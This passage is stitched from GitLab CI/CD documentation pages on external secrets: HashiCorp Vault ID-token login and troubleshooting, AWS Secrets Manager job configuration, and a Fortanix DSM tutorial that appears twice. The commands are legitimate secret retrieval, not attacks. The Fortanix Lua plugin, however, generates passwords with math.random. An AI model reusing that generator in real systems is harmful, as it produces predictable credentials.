    - access-first-db.sh --token $FIRST_DB_PASSWORD
    - access-second-db.sh --token $SECOND_DB_PASSWORD
```

### Manual ID Token authentication

You can use ID tokens to authenticate with HashiCorp Vault manually. For example:

```yaml
manual_authentication:
  variables:
    VAULT_ADDR: http://vault.example.com:8200
  image: vault:latest
  id_tokens:
    VAULT_ID_TOKEN:
      aud: http://vault.example.com
  script:
    - export VAULT_TOKEN="$(vault write -field=token auth/jwt/login role=myproject-example jwt=$VAULT_ID_TOKEN)"
    - export PASSWORD="$(vault kv get -field=password secret/myproject/example/db)"
    - my-authentication-script.sh $VAULT_TOKEN $PASSWORD
```

### Limit token access to Vault secrets

You can control ID token access to Vault secrets by using Vault protections and GitLab features. For example, restrict the token by:

- Using Vault [bound audiences](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-audiences) for specific ID token `aud` claims.
- Using Vault [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) for specific groups using `group_claim`.
- Hard coding values for Vault bound claims based on the `user_login` and `user_email` of specific users.
- Setting Vault time limits for TTL of the token as specified in [`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl), where the token expires after authentication.
- Scoping the JWT to [GitLab protected branches](../../user/project/repository/branches/protected.md) that are restricted to a subset of project users.
- Scoping the JWT to [GitLab protected tags](../../user/project/protected_tags.md) that are restricted to a subset of project users.
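The manual `vault write auth/jwt/login` step shown above corresponds to a POST against Vault's documented login endpoint (`/v1/auth/jwt/login`). The sketch below builds that login payload and extracts the short-lived client token from a sample response body; the role name and token value are placeholders, and the response shape follows Vault's login API.

```python
import json

# Build the JWT login payload that `vault write auth/jwt/login` sends
# to POST $VAULT_ADDR/v1/auth/jwt/login (role and jwt are placeholders).
def build_login_payload(role: str, jwt: str) -> str:
    return json.dumps({"role": role, "jwt": jwt})

# Extract the short-lived client token from a login response body.
def client_token(response_body: str) -> str:
    return json.loads(response_body)["auth"]["client_token"]

payload = build_login_payload("myproject-staging", "<VAULT_ID_TOKEN>")
sample_response = '{"auth": {"client_token": "hvs.example", "lease_duration": 60}}'
print(client_token(sample_response))  # hvs.example
```

With `token_explicit_max_ttl` set to 60 as in the roles above, the returned client token is only valid for one minute, so fetch secrets immediately after logging in.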
## Troubleshooting

### `The secrets provider can not be found. Check your CI/CD variables and try again.` message

You might receive this error when attempting to start a job configured to access HashiCorp Vault:

```plaintext
The secrets provider can not be found. Check your CI/CD variables and try again.
```

The job can't be created because the required variable is not defined:

- `VAULT_SERVER_URL`

### `api error: status code 400: missing role` error

You might receive a `missing role` error when attempting to start a job configured to access HashiCorp Vault. The error could be because the `VAULT_AUTH_ROLE` variable is not defined, so the job cannot authenticate with the Vault server.

### `audience claim does not match any expected audience` error

If there is a mismatch between the value of the `aud:` claim of the ID token specified in the YAML file and the `bound_audiences` parameter of the `role` used for JWT authentication, you can get this error:

```plaintext
invalid audience (aud) claim: audience claim does not match any expected audience
```

Make sure these values are the same.
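When debugging an audience mismatch, it helps to inspect the claims inside the ID token itself. A JWT payload is just base64url-encoded JSON, so the `aud` and `iss` claims can be read without verifying the signature. The sketch below builds a sample token with known claims and decodes it; remember that a real ID token is a credential, so never paste one into an untrusted tool.

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Build a sample token with a known payload, for illustration only.
header = base64.urlsafe_b64encode(b'{"alg":"RS256"}').rstrip(b"=").decode()
body = base64.urlsafe_b64encode(
    json.dumps({"iss": "https://gitlab.example.com",
                "aud": "https://vault.example.com"}).encode()
).rstrip(b"=").decode()
token = f"{header}.{body}.signature"

claims = jwt_claims(token)
print(claims["aud"])  # https://vault.example.com
```

Compare the decoded `aud` value against the role's `bound_audiences`, and the `iss` value against the auth method's `bound_issuer`.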
---
title: Use AWS Secrets Manager secrets in GitLab CI/CD
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
source: https://docs.gitlab.com/ci/aws_secrets_manager
repo: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/aws_secrets_manager.md
extracted: 2025-08-13
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/17822) in GitLab 18.2 [with a flag](../../administration/feature_flags/_index.md) named `ci_aws_secrets_manager`. Disabled by default.
- [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/553970) in GitLab 18.3.

{{< /history >}}

You can use secrets stored in [AWS Secrets Manager](https://aws.amazon.com/secrets-manager/) in your GitLab CI/CD pipelines.

Prerequisites:

- Have access to AWS Secrets Manager in your AWS account.
- Configure authentication using one of the following methods:
  - **IAM Role**: Use the IAM role assigned to your GitLab Runner instance.
  - **OpenID Connect**: [Configure OpenID Connect in AWS](../cloud_services/aws/_index.md) to retrieve temporary credentials.
- Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your AWS configuration:
  - `AWS_REGION`: The AWS region where your secrets are stored.
  - `AWS_ROLE_ARN`: The ARN of the AWS IAM role to assume (required when using OpenID Connect).
  - `AWS_ROLE_SESSION_NAME`: Optional. Custom session name for the assumed role.

## Use AWS Secrets Manager secrets in a CI/CD job

### With IAM Role authentication

You can use a secret stored in AWS Secrets Manager in a job by defining it with the `aws_secrets_manager` keyword. This method uses the IAM role assigned to your GitLab Runner instance.

Prerequisites:

- GitLab Runner 18.3 or later.

For example:

```yaml
variables:
  AWS_REGION: us-east-1

database-migration:
  secrets:
    DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: app-secrets/database
        field: 'password'
      file: false
  stage: deploy
  script:
    - echo "Running database migration..."
    - mysql -h $DB_HOST -u $DB_USER -p$DATABASE_PASSWORD < migration.sql
    - echo "Migration completed successfully."
```

### With OpenID Connect authentication

For enhanced security, you can use OpenID Connect to authenticate with AWS and assume a specific IAM role. By default, the runner looks for an ID token named `AWS_ID_TOKEN`.

For example:

```yaml
variables:
  AWS_REGION: us-east-1
  AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/gitlab-secrets-role'

database-migration:
  id_tokens:
    AWS_ID_TOKEN:
      aud: 'sts.amazonaws.com'
  secrets:
    DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: app-secrets/database
        field: 'password'
      file: false
  stage: deploy
  script:
    - echo "Connecting to production database..."
    - psql postgresql://$DB_USER:$DATABASE_PASSWORD@$DB_HOST:5432/$DB_NAME -c "SELECT version();"
    - echo "Database connection successful."
```

You can also specify a custom token using the `token` option. For example:

```yaml
variables:
  AWS_REGION: us-east-1
  AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/gitlab-secrets-role'

database-migration:
  id_tokens:
    CUSTOM_AWS_TOKEN:
      aud: 'sts.amazonaws.com'
  secrets:
    DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: app-secrets/database
        field: 'password'
        token: $CUSTOM_AWS_TOKEN
      file: false
  stage: deploy
  script:
    - echo "Connecting to production database with custom token..."
    - psql postgresql://$DB_USER:$DATABASE_PASSWORD@$DB_HOST:5432/$DB_NAME -c "SELECT version();"
    - echo "Database connection successful."
```

### Short form syntax

You can use a simplified syntax by specifying the secret ID as a string. You can optionally specify a field by separating it with a `#` character.

For example:

```yaml
variables:
  AWS_REGION: us-east-1

api-deployment:
  secrets:
    API_KEY:
      aws_secrets_manager: 'app-secrets/api#api_key'
      file: false
    FULL_SECRET:
      aws_secrets_manager: 'app-secrets/api'
      file: false
  stage: deploy
  script:
    - echo "Deploying API with specific field..."
    - curl --header "Authorization: Bearer $API_KEY" https://api.example.com/deploy
    - echo "Using full secret..."
    - curl --header "Authorization: Bearer $(cat $FULL_SECRET | jq --raw-output '.api_key')" https://api.example.com/status
```

## Secret versioning

AWS Secrets Manager supports multiple versions of secrets. You can specify a particular version using either `version_id` or `version_stage`.

For example:

```yaml
variables:
  AWS_REGION: us-east-1

production-deployment:
  secrets:
    DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: prod-app-secrets/database
        field: 'password'
        version_stage: 'AWSCURRENT'
      file: false
    STAGING_DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: prod-app-secrets/database
        field: 'password'
        version_id: '01234567-89ab-cdef-0123-456789abcdef'
      file: false
  stage: deploy
  script:
    - echo "Deploying to production with current secret version..."
    - deploy-prod.sh --db-password $DATABASE_PASSWORD
    - echo "Testing with specific secret version..."
    - test-with-version.sh --db-password $STAGING_DATABASE_PASSWORD
```

## Cross-account secret access

To retrieve secrets from another AWS account, you must use the full ARN.

For example:

```yaml
variables:
  AWS_REGION: us-east-1
  AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/cross-account-secrets-role'

cross-account-deployment:
  id_tokens:
    AWS_ID_TOKEN:
      aud: 'sts.amazonaws.com'
  secrets:
    SHARED_API_KEY:
      aws_secrets_manager:
        secret_id: 'arn:aws:secretsmanager:us-east-1:987654321098:secret:shared-api-keys-AbCdEf'
        field: 'production_key'
      file: false
  stage: deploy
  script:
    - echo "Accessing shared secret from another account..."
    - curl --header "Authorization: Bearer $SHARED_API_KEY" https://shared-api.example.com/deploy
```

## Per-secret configuration overrides

You can override global AWS settings on a per-secret basis.
For example:

```yaml
variables:
  AWS_REGION: us-east-1
  AWS_ROLE_ARN: 'arn:aws:iam::123456789012:role/default-role'

multi-region-deployment:
  id_tokens:
    AWS_ID_TOKEN:
      aud: 'sts.amazonaws.com'
    EU_AWS_TOKEN:
      aud: 'sts.amazonaws.com'
  secrets:
    EU_DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: eu-app-secrets/database
        field: 'password'
        region: 'eu-west-1'
        role_arn: 'arn:aws:iam::123456789012:role/eu-deployment-role'
        role_session_name: 'gitlab-eu-deployment'
        token: $EU_AWS_TOKEN
      file: false
    US_DATABASE_PASSWORD:
      aws_secrets_manager:
        secret_id: us-app-secrets/database
        field: 'password'
      file: false
  stage: deploy
  script:
    - echo "Deploying to EU region..."
    - deploy-to-eu.sh --db-password $EU_DATABASE_PASSWORD
    - echo "Deploying to US region..."
    - deploy-to-us.sh --db-password $US_DATABASE_PASSWORD
```

In these examples:

- `aud`: The audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/aws/_index.md).
- `secret_id`: The name or ARN of the secret in AWS Secrets Manager. To retrieve a secret from another account, you must use an ARN.
- `field`: The specific key in the JSON secret to retrieve. If not specified, the entire secret is retrieved. Field access is only supported for flat JSON secrets (top-level keys only) and supports string, number, and boolean values. For example:
  - `password`: Accesses the `password` field.
  - `api_key`: Accesses the `api_key` field.
- `token`: Specifies which ID token to use for authentication. If not specified, the runner looks for a token named `AWS_ID_TOKEN`.
- `version_id`: The unique identifier of a specific version of the secret. If you don't specify either `version_id` or `version_stage`, AWS Secrets Manager returns the `AWSCURRENT` version.
- `version_stage`: The staging label of the version of the secret to retrieve (such as `AWSCURRENT` or `AWSPENDING`). You cannot specify both `version_id` and `version_stage` for the same secret.
- `region`: Overrides the global `AWS_REGION` for this specific secret.
- `role_arn`: Overrides the global `AWS_ROLE_ARN` for this specific secret.
- `role_session_name`: Overrides the global `AWS_ROLE_SESSION_NAME` for this specific secret.

GitLab fetches the secret from AWS Secrets Manager and stores the value in a temporary file. The path to this file is stored in a CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables).

## Troubleshooting

Refer to [OIDC for AWS troubleshooting](../cloud_services/aws/_index.md#troubleshooting) for general problems when setting up OIDC with AWS.
---
title: 'Tutorial: Use Fortanix Data Security Manager (DSM) with GitLab'
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
source: https://docs.gitlab.com/ci/fortanix_dsm_integration
repo: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/fortanix_dsm_integration.md
extracted: 2025-08-13
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can use Fortanix Data Security Manager (DSM) as your secrets manager for GitLab CI/CD pipelines.

This tutorial explains the steps required to generate new secrets in Fortanix DSM, or use existing secrets, and use them in GitLab CI/CD jobs. Follow the instructions carefully to implement this integration, enhancing data security and optimizing your CI/CD pipelines.

## Before you begin

Ensure that you have:

- Access to a Fortanix DSM account with appropriate administrative privileges. For more information, refer to [Getting Started with Fortanix Data Security Manager](https://www.fortanix.com/start-your-free-trial).
- A [GitLab account](https://gitlab.com/users/sign_up) with access to the project where you intend to set up the integration.
- Knowledge about the process of saving secrets in Fortanix DSM, including generating and importing secrets.
- Access to necessary permissions in Fortanix DSM and GitLab for group, application, plugin, variable, and secret management.

## Generate and import a new secret

To generate a new secret in Fortanix DSM and use it with GitLab:

1. Sign in to your Fortanix DSM account.
1. In Fortanix DSM, [create a new group and an application](https://support.fortanix.com/hc/en-us/articles/360015809372-User-s-Guide-Getting-Started-with-Fortanix-Data-Security-Manager-UI).
1. Configure the [API Key as the authentication method for the application](https://support.fortanix.com/hc/en-us/articles/360033272171-User-s-Guide-Authentication).
1. Use the following code to generate a new plugin in Fortanix DSM:

   ```lua
   numericAlphabet = "0123456789"
   alphanumericAlphabet = numericAlphabet .. "abcdefghijklmnopqrstuvwxyz"
   alphanumericCapsAlphabet = alphanumericAlphabet .. "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
   alphanumericCapsSymbolsAlphabets = alphanumericCapsAlphabet .. "!@#$&*_%="

   function genPass(alphabet, len, name, import)
       local alphabetSize = #alphabet
       local password = ''
       for i = 1, len, 1 do
           local random_char = math.random(alphabetSize)
           password = password .. string.sub(alphabet, random_char, random_char)
       end
       local pass = Blob.from_bytes(password)
       if import == "yes" then
           local sobject = assert(Sobject.import {
               name = name,
               obj_type = "SECRET",
               value = pass,
               key_ops = {'APPMANAGEABLE', 'EXPORT'}
           })
           return password
       end
       return password
   end

   function run(input)
       if input.type == "numeric" then
           return genPass(numericAlphabet, input.length, input.name, input.import)
       end
       if input.type == "alphanumeric" then
           return genPass(alphanumericAlphabet, input.length, input.name, input.import)
       end
       if input.type == "alphanumeric_caps" then
           return genPass(alphanumericCapsAlphabet, input.length, input.name, input.import)
       end
       if input.type == "alphanumeric_caps_symbols" then
           return genPass(alphanumericCapsSymbolsAlphabets, input.length, input.name, input.import)
       end
   end
   ```

   For more information, see the [Fortanix User's Guide: Plugin Library](https://support.fortanix.com/hc/en-us/articles/360041950371-User-s-Guide-Plugin-Library).

   - Set the import option to `yes` if you want to store the secret in Fortanix DSM:

     ```json
     {
       "type": "alphanumeric_caps",
       "length": 64,
       "name": "GitLab-Secret",
       "import": "yes"
     }
     ```

   - Set the import option to `no` if you only want a new value generated for rotation:

     ```json
     {
       "type": "numeric",
       "length": 64,
       "name": "GitLab-Secret",
       "import": "no"
     }
     ```

1. In GitLab, on the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables** and add these variables:

   - `FORTANIX_API_ENDPOINT`
   - `FORTANIX_API_KEY`
   - `FORTANIX_PLUGIN_ID`

1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration:

   ```yaml
   stages:
     - build

   build:
     stage: build
     image: ubuntu
     script:
       - apt-get update
       - apt install --assume-yes jq
       - apt install --assume-yes curl
       - jq --version
       - curl --version
       - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"name\":\"$CI_PIPELINE_ID\",\"import\":\"yes\", \"length\":\"48\"}" | jq --raw-output)
       - nsecret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"import\":\"no\", \"length\":\"48\"}" | jq --raw-output)
       - encodesecret=$(echo $nsecret | base64)
       - rotate=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/rekey --data "{\"name\":\"$CI_PIPELINE_ID\", \"value\":\"$encodesecret\"}" | jq --raw-output .kid)
   ```

1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**.
1. Go to **Build > Jobs** and check the `build` job's log:

   ![gitlab_build_result_1](img/gitlab_build_result_1_v16_9.png)

   ![dsm_secrets](img/dsm_secrets_v16_9.png)

## Use an existing secret from Fortanix DSM

To use a secret that already exists in Fortanix DSM with GitLab:

1. The secret must be marked as exportable in Fortanix:

   ![dsm_secret_import_1](img/dsm_secret_import_1_v16_9.png)

1. In GitLab, on the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables** and add these variables:

   - `FORTANIX_API_ENDPOINT`
   - `FORTANIX_API_KEY`
   - `FORTANIX_SECRET_NAME`

1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration:

   ```yaml
   stages:
     - build

   build:
     stage: build
     image: ubuntu
     script:
       - apt-get update
       - apt install --assume-yes jq
       - apt install --assume-yes curl
       - jq --version
       - curl --version
       - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME}\"}" | jq --raw-output .value)
   ```

1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**.
1. Go to **Build > Jobs** and check the `build` job's log:

   ![gitlab_build_result_2](img/gitlab_build_result_2_v16_9.png)

## Code Signing

To set up code signing securely in your GitLab environment:

1. Sign in to your Fortanix DSM account.
1. Import `keystore_password` and `key_password` as secrets in Fortanix DSM. Ensure that they are marked as exportable.

   ![dsm_secret_import_2](img/dsm_secret_import_2_v16_9.png)

1. In GitLab, on the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables** and add these variables:

   - `FORTANIX_API_ENDPOINT`
   - `FORTANIX_API_KEY`
   - `FORTANIX_SECRET_NAME_1` (for `keystore_password`)
   - `FORTANIX_SECRET_NAME_2` (for `key_password`)

1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration:

   ```yaml
   stages:
     - build

   build:
     stage: build
     image: ubuntu
     script:
       - apt-get update -qy
       - apt install --assume-yes jq
       - apt install --assume-yes curl
       - apt-get install wget
       - apt-get install unzip
       - apt-get install --assume-yes openjdk-8-jre-headless openjdk-8-jdk # Install Java
       - keystore_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_1}\"}" | jq --raw-output .value)
       - key_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_2}\"}" | jq --raw-output .value)
       - echo "yes" | keytool -genkeypair -alias mykey -keyalg RSA -keysize 2048 -keystore keystore.jks -storepass $keystore_password -keypass $key_password -dname "CN=test"
       - mkdir -p src/main/java
       - echo 'public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World!"); } }' > src/main/java/HelloWorld.java
       - javac src/main/java/HelloWorld.java
       - mkdir -p target
       - jar cfe target/HelloWorld.jar HelloWorld -C src/main/java HelloWorld.class
       - jarsigner -keystore keystore.jks -storepass $keystore_password -keypass $key_password -signedjar signed.jar target/HelloWorld.jar mykey
   ```

1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**.
1. Go to **Build > Jobs** and check the `build` job's log:

   ![gitlab_build_result_3](img/gitlab_build_result_3_v16_9.png)
---
type: concepts, howto
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: 'Tutorial: Use Fortanix Data Security Manager (DSM) with GitLab'
breadcrumbs:
- doc
- ci
- secrets
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can use Fortanix Data Security Manager (DSM) as your secrets manager for GitLab CI/CD pipelines. This tutorial explains the steps required to generate new secrets in Fortanix DSM, or use existing secrets, and use them in GitLab CI/CD jobs.

Follow the instructions carefully to implement this integration, enhancing data security and optimizing your CI/CD pipelines.

## Before you begin

Ensure that you have:

- Access to a Fortanix DSM account with appropriate administrative privileges. For more information, refer to [Getting Started with Fortanix Data Security Manager](https://www.fortanix.com/start-your-free-trial).
- A [GitLab account](https://gitlab.com/users/sign_up) with access to the project where you intend to set up the integration.
- Knowledge about the process of saving secrets in Fortanix DSM, including generating and importing secrets.
- Access to necessary permissions in Fortanix DSM and GitLab for group, application, plugin, variable, and secret management.

## Generate and import a new secret

To generate a new secret in Fortanix DSM and use it with GitLab:

1. Sign in to your Fortanix DSM account.
1. In Fortanix DSM, [create a new group and an application](https://support.fortanix.com/hc/en-us/articles/360015809372-User-s-Guide-Getting-Started-with-Fortanix-Data-Security-Manager-UI).
1. Configure the [API Key as the authentication method for the application](https://support.fortanix.com/hc/en-us/articles/360033272171-User-s-Guide-Authentication).
1. Use the following code to generate a new plugin in Fortanix DSM:

   ```lua
   numericAlphabet = "0123456789"
   alphanumericAlphabet = numericAlphabet .. "abcdefghijklmnopqrstuvwxyz"
   alphanumericCapsAlphabet = alphanumericAlphabet .. "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
   alphanumericCapsSymbolsAlphabets = alphanumericCapsAlphabet .. "!@#$&*_%="

   function genPass(alphabet, len, name, import)
     local alphabetSize = #alphabet
     local password = ''
     for i = 1, len, 1 do
       local random_char = math.random(alphabetSize)
       password = password .. string.sub(alphabet, random_char, random_char)
     end
     local pass = Blob.from_bytes(password)
     if import == "yes" then
       local sobject = assert(Sobject.import { name = name, obj_type = "SECRET", value = pass, key_ops = {'APPMANAGEABLE', 'EXPORT'} })
       return password
     end
     return password
   end

   function run(input)
     if input.type == "numeric" then
       return genPass(numericAlphabet, input.length, input.name, input.import)
     end
     if input.type == "alphanumeric" then
       return genPass(alphanumericAlphabet, input.length, input.name, input.import)
     end
     if input.type == "alphanumeric_caps" then
       return genPass(alphanumericCapsAlphabet, input.length, input.name, input.import)
     end
     if input.type == "alphanumeric_caps_symbols" then
       return genPass(alphanumericCapsSymbolsAlphabets, input.length, input.name, input.import)
     end
   end
   ```

   For more information, see the [Fortanix User's Guide: Plugin Library](https://support.fortanix.com/hc/en-us/articles/360041950371-User-s-Guide-Plugin-Library).

   - Set the import option to `yes` if you want to store the secret in Fortanix DSM:

     ```json
     {
       "type": "alphanumeric_caps",
       "length": 64,
       "name": "GitLab-Secret",
       "import": "yes"
     }
     ```

   - Set the import option to `no` if you only want a new value generated for rotation:

     ```json
     {
       "type": "numeric",
       "length": 64,
       "name": "GitLab-Secret",
       "import": "no"
     }
     ```

1. In GitLab, on the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables** and add these variables:

   - `FORTANIX_API_ENDPOINT`
   - `FORTANIX_API_KEY`
   - `FORTANIX_PLUGIN_ID`

1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration:

   ```yaml
   stages:
     - build

   build:
     stage: build
     image: ubuntu
     script:
       - apt-get update
       - apt install --assume-yes jq
       - apt install --assume-yes curl
       - jq --version
       - curl --version
       - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"name\":\"$CI_PIPELINE_ID\",\"import\":\"yes\", \"length\":\"48\"}" | jq --raw-output)
       - nsecret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"import\":\"no\", \"length\":\"48\"}" | jq --raw-output)
       - encodesecret=$(echo $nsecret | base64)
       - rotate=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/rekey --data "{\"name\":\"$CI_PIPELINE_ID\", \"value\":\"$encodesecret\"}" | jq --raw-output .kid)
   ```

1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**.
1. Go to **Build > Jobs** and check the `build` job's log:

   ![gitlab_build_result_1](img/gitlab_build_result_1_v16_9.png)

   ![dsm_secrets](img/dsm_secrets_v16_9.png)

## Use an existing secret from Fortanix DSM

To use a secret that already exists in Fortanix DSM with GitLab:

1. The secret must be marked as exportable in Fortanix:

   ![dsm_secret_import_1](img/dsm_secret_import_1_v16_9.png)

1. In GitLab, on the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables** and add these variables:

   - `FORTANIX_API_ENDPOINT`
   - `FORTANIX_API_KEY`
   - `FORTANIX_SECRET_NAME`
1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration:

   ```yaml
   stages:
     - build

   build:
     stage: build
     image: ubuntu
     script:
       - apt-get update
       - apt install --assume-yes jq
       - apt install --assume-yes curl
       - jq --version
       - curl --version
       - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME}\"}" | jq --raw-output .value)
   ```

1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**.
1. Go to **Build > Jobs** and check the `build` job's log:

   ![gitlab_build_result_2](img/gitlab_build_result_2_v16_9.png)

## Code Signing

To set up code signing securely in your GitLab environment:

1. Sign in to your Fortanix DSM account.
1. Import `keystore_password` and `key_password` as secrets in Fortanix DSM. Ensure that they are marked as exportable.

   ![dsm_secret_import_2](img/dsm_secret_import_2_v16_9.png)

1. In GitLab, on the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables** and add these variables:

   - `FORTANIX_API_ENDPOINT`
   - `FORTANIX_API_KEY`
   - `FORTANIX_SECRET_NAME_1` (for `keystore_password`)
   - `FORTANIX_SECRET_NAME_2` (for `key_password`)
1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration:

   ```yaml
   stages:
     - build

   build:
     stage: build
     image: ubuntu
     script:
       - apt-get update -qy
       - apt install --assume-yes jq
       - apt install --assume-yes curl
       - apt-get install --assume-yes wget
       - apt-get install --assume-yes unzip
       - apt-get install --assume-yes openjdk-8-jre-headless openjdk-8-jdk # Install Java
       - keystore_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_1}\"}" | jq --raw-output .value)
       - key_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_2}\"}" | jq --raw-output .value)
       - echo "yes" | keytool -genkeypair -alias mykey -keyalg RSA -keysize 2048 -keystore keystore.jks -storepass $keystore_password -keypass $key_password -dname "CN=test"
       - mkdir -p src/main/java
       - echo 'public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World!"); } }' > src/main/java/HelloWorld.java
       - javac src/main/java/HelloWorld.java
       - mkdir -p target
       - jar cfe target/HelloWorld.jar HelloWorld -C src/main/java HelloWorld.class
       - jarsigner -keystore keystore.jks -storepass $keystore_password -keypass $key_password -signedjar signed.jar target/HelloWorld.jar mykey
   ```

1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**.
1. Go to **Build > Jobs** and check the `build` job's log:

   ![gitlab_build_result_3](img/gitlab_build_result_3_v16_9.png)
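To confirm that signing succeeded, a verification step can be appended to the job's `script` section. This is a sketch, not part of the original tutorial; `jarsigner -verify` only inspects the signed archive and exits non-zero when the signature is missing or invalid:

```yaml
    # Appended to the end of the build job's script section (sketch):
    # verify the signature on the jar produced by the previous step.
    - jarsigner -verify -verbose signed.jar
```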
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using external secrets in CI
breadcrumbs:
- doc
- ci
- secrets
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Secrets represent sensitive information your CI job needs to complete work. This sensitive information can be items like API tokens, database credentials, or private keys. Secrets are sourced from your secrets provider.

Unlike CI/CD variables, which are always presented to a job, secrets must be explicitly required by a job. Read [GitLab CI/CD pipeline configuration reference](../yaml/_index.md#secrets) for more information about the syntax.

GitLab provides support for the following secret management providers:

1. [Vault by HashiCorp](#use-vault-secrets-in-a-ci-job)
1. [Google Cloud Secret Manager](gcp_secret_manager.md)
1. [Azure Key Vault](azure_key_vault.md)

